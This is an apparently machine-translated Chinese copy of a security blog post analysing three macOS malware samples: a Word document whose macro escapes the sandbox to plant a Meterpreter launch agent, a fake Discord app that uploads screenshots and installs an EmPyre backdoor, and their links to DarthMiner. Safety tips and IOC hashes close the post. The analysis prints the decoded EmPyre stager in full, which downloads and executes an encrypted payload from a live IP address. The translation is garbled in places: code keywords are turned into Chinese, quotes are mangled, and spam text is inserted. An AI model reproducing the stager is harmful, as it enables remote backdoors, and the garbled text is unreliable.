上周,我们写了一个新的恶意软件叫做达什米尔. 事实证明,我们还可以看到更多的恶意软件,因为不仅发现了一个,还发现了另外两个恶意软件。第一个是由微软的约翰·兰伯特确认的,由Objective See的帕特里克·沃德尔分析,第二个是由马尔瓦雷比的亚当·托马斯发现的。必威平台APP

带有恶意宏的Word文档

Lambert识别出一个恶意的Microsoft Word文档在Tweet中包含恶意Visual Basic宏,该Tweet提供了指向该文件的VirusTotal链接。沃德尔分析了文件,命名为BitcoinMagazine-Quidax_InterviewQuestions_2018.docm,以及它掉落的有效载荷。

通常,MicrosoftOffice文档中的宏是沙盒的,这意味着它们不应该具有对文件系统进行任何更改的能力。但是,在本例中,文档使用沙盒转义在系统上创建启动代理。此启动代理为设置Meterpreter后门。

有趣的是,此恶意软件是来自亚当·切斯特出版的概念证明在2月份的时候,甚至回收了提到切斯特博客网站的标识符,除了切斯特假设使用的是EmPyre而不是Meterpreter作为后门。

当然,攻击依赖于用户打开恶意Word文档并允许宏运行,因此社会工程是主要的陷阱。只要你永远,曾经允许宏在Microsoft Office文档中运行,您就不会受到此类恶意软件的攻击。

恶意的不和谐模仿者

星期五,亚当·托马斯发现了Discord的恶意副本,这是一个供玩家与其他玩家通信的应用程序。然而,Discord的这个副本似乎没有任何作用,因为它实际上是一个对用户没有任何作用的自动机脚本。

上面以编辑过的形式显示的脚本适合屏幕截图,它解码并执行Python负载,然后开始重复截图并将其上传到命令和控制(C&C)服务器。

解码后的有效负载包含相当多的Python代码,包括两段额外的base64编码Python代码片段。其中一段代码设置了EmPyre后门:

qPnQAZwbqBZ='PBlqIV'导入sys,urllib2;导入re,subprocess;cmd=“ps-ef | grep Little\Snitch | grep-v grep”ps=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE)out=ps.stdout.read()ps.stdout.close(),如果re.search(“Little Snitch”,out):sys.exit()o=\uu导入{({2:'urllib2',:'urllib2',:'urllib.request'}[sys.version],from][]信息列表[0]=.build_opener();UA='Mozilla/5.0(Macintosh;Intel Mac OS X 10.11;rv:45.0)Gecko/20100101 Firefox/45.0';o.addheaders=[('User-Agent',UA)];a=o.open('http://37.1.221.204:8080/index.asp“).read();key='7b3639a4ab39765739a5e0ed75bc8016';S,j,out=range(256),0,[]对于范围内的i(256):j=(j+S[i]+ord(key[i%len(key)])%256 S[i],S[j]=S[j],S[i]i=j=0表示a中的字符:i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i]out.append(chr(ord(char)^S[(S[i]+S[j])exec(“”.join(out))

该脚本还设置了一个名为com.apple.systemkeeper.plist,它持续保持截图代码和EmPyre后门代码运行。

这个恶意软件真的很难令人信服,因为它根本没有假装它是一个合法的Discord应用程序。它不是一个恶意修改的Discord应用程序副本。它甚至没有包括并发布Discord应用程序的副本,这可以很容易地作为一个诡计使应用程序看起来合法。就这点而言,它甚至没有使用令人信服的图标!

相反,该恶意软件使用一个通用的Automator小程序图标,运行时只会在菜单栏中出现一个齿轮图标(这对于任何Automator脚本来说都是正常的)。

当然,当用户发现问题时,恶意软件已经设置了启动代理,打开了后门,并发送了一些屏幕截图。许多用户可能会注意到某些东西关闭了,但他们可能不知道该怎么办。

有趣的相似之处

这个假的Discord恶意软件之间有一些有趣的相似之处,Malwarebytes将其检测为必威平台APP拉梅派尔,以及本周早些时候发现的OSX.DarthMiner恶意软件。两者都是以自动机小程序的形式分发的,两个小程序都运行Python脚本,并且都使用EmPyre后门。

然而,也存在一些差异。在这两种情况下,运行Python脚本的方法是不同的。此外,恶意软件明显的主要用途也不同:在DarthMiner的情况下是加密挖掘,在LamePyre的情况下是截屏。

看起来很可能是同一个人做的,但也有可能是一个人模仿了另一个人。

宏恶意软件(Malwarebytes当前检测为必威平台APP坏字,因为没有正式名称)类似地使用Python设置后门,与OSX.DarthMiner一样,它直接在launch agent中执行Python代码,这有点不同寻常。当然,它使用不同的后门和不同的交付方法。

这三家公司都大量使用以开源后门形式借用的代码(两个是EmPyre,第三个是Metasploit的MeterMeter模块),以及直接从研究人员的博客复制粘贴VBA漏洞代码。

两个恶意软件,一个制造商?

所有这些恶意软件之间的相似性,以及时间上的巧合(都是在大约一个月内首次提交给VirusTotal的),可能意味着它们都是由同一个恶意软件开发人员制作的。

然而,目前还没有具体证据支持这一假设。这些恶意软件与之通信的IP地址分布在全球的美国、卢森堡、德国和荷兰,它们之间没有明显的联系。代码类似,但不完全相同。

目前,我们正在用不同的名字来称呼它们,但将继续调查。

同时,为了保持安全,你能做的最好的事情是:

  • 不允许在Microsoft Office文档中运行宏
  • 不要从开发者官方网站以外的任何地方下载软件,尤其是盗版网站
  • 不要打开任何东西除非你知道发送者,并期待它通过电子邮件发送给你
  • 如果你打开一个新下载的应用程序,发现有些东西没有按预期工作,请与开发人员联系

IOCs

BitcoinMagazine-Quidax_InterviewQuestions_2018.docm:4454E768B295ED2869F657B2E9F47421B6CA0548E6709735665CD339A41DDDB DiscordApp.app.zip:a899a7d33d9ba80b6f9500585fa108178753894dfd249c2ba64c9d6a601c516b